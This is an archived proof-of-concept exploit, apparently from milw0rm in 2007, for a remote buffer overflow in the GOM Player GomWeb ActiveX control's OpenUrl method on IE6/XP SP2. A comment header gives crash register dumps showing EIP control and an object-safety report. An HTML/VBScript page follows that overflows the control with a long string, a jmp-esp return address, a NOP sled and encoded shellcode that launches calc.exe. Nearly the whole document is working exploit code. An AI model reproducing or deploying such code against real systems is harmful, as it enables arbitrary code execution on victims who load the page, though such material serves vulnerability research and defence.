<!--
GOM Player 2.1.6.3499 GomWeb Control (GomWeb3.dll 1.0.0.12) remote buffer
overflow poc exploit (ie6/xp sp2)

quote from Wikipedia: "GOM Player(Gretech Online Movie Player) is South
Korea's most popular media player; as of July 2007, it had 8.4 million users,
compared to 5.4 million of Microsoft's Windows Media Player. Users most
commonly use the player to watch pornography..."
mphhh ...

passing more than 506 "A" to OpenUrl method:

EAX 00000000
ECX 7C80240F kernel32.7C80240F
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 00000000
ESP 0012CDD0 ASCII "AAAAAAAAAAAAAAAAAA...
EBP 0012DE08
ESI 003390B0
EDI 0000102A
EIP 41414141

object safety report:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
IPStorage Safe:  Safe for untrusted: caller,data

software site: http://www.gomplayer.com/main.html

rgod
site: http://retrogod.altervista.org
-->
<html>
<object classid='clsid:DC07C721-79E0-4BD4-A89F-C90871946A31' id='GomManager' /></object>
<script language='vbscript'>
//open calc.exe
scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
             unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
             unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
             unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
             unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
             unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
             unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
             unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
             unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
             unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
             unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
             unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
             unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
             unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
             unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
             unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
             unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
             unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
             unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
             unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
             unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
eip = unescape("%67%31%41%7e") 'jmp esp kernel32.dll
nop = String(48, unescape("%90"))
sURL=String(506, "A") + eip + nop + scode
GomManager.OpenURL sURL
</script>
</html>

# milw0rm.com [2007-10-29]
